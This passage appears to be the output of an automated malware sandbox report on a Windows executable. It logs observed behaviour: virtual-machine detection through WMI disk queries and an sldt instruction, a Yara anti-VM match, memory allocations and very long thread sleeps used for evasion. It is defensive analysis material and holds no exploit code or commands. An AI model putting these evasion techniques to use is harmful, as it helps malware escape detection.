                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AntiVM3
                            Source: Yara matchFile source: Process Memory Space: 3u8A2xjbBT.exe PID: 6464, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 3u8A2xjbBT.exe PID: 2908, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 3u8A2xjbBT.exe PID: 4704, type: MEMORYSTR
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 1620000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 33A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 5940000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 6940000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 6A70000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 7A70000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 7E00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 8E00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 9E00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 5160000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 6160000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 6290000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 7290000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 75E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 85E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 1820000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 3030000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 5030000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 57B0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 67B0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 68E0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 78E0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 7C70000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: 8C70000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_05832D40 sldt word ptr [eax]15_2_05832D40
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWindow / User API: threadDelayed 2839Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWindow / User API: threadDelayed 6938Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWindow / User API: threadDelayed 7034Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWindow / User API: threadDelayed 2753Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWindow / User API: threadDelayed 4397
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWindow / User API: threadDelayed 5383
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep count: 38 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -39830s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6356Thread sleep count: 2839 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -39705s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -39580s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6356Thread sleep count: 6938 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -39455s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -39330s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -39205s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -39094s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -38984s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -38846s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -38734s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -38512s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -38392s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -38145s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -37689s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -37392s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -36984s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -36873s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -36767s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -36642s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -36517s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -36392s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -36267s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -36142s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -36017s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -35892s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -35767s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -35642s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -35517s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -35392s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -35267s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -35142s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -35017s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -34892s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -34752s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -34627s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -34455s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -34300s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -33731s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -33622s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -33514s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -33406s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -33299s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -33174s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -33049s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -32924s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -32799s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -32674s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -32549s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -32424s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -32299s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -32174s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -32049s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -31924s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -31799s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 4732Thread sleep time: -31674s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep count: 36 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -39830s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -39705s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 5404Thread sleep count: 7034 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep count: 31 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -39580s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 5404Thread sleep count: 2753 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -39455s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -39330s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -39205s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -39080s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -38955s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -38830s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -38705s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -38580s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -38455s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -38330s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -38205s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -38080s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -37152s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -36833s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -36705s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -36580s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -36455s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -36330s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -36205s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -36080s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -35955s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -35830s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -35705s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -35580s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -35455s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -35330s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -35205s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -35080s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -34955s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -34830s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -34705s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -34580s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -34398s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -34276s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -34081s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -33686s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -33361s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -33235s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -33098s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -32942s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -32814s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -32689s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -32564s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -32439s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -32314s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -32189s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -32064s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -31939s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 2412Thread sleep time: -31814s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep count: 36 > 30
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -33204139332677172s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -39830s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -39705s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 576Thread sleep count: 4397 > 30
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 576Thread sleep count: 5383 > 30
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -39580s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -39455s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -39330s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -39205s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -39080s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -38955s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -38830s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -38705s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -38580s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -38455s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -38330s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -38205s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -38080s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -37908s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -37782s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -37663s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -37449s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -37283s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -37156s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -36779s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -36533s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -36339s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -36228s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -36111s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -35986s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -35861s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -35721s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -35596s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -35471s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -35346s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -35221s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -35096s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -34971s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -34846s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -34721s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -34596s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -34471s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -34346s >= -30000s
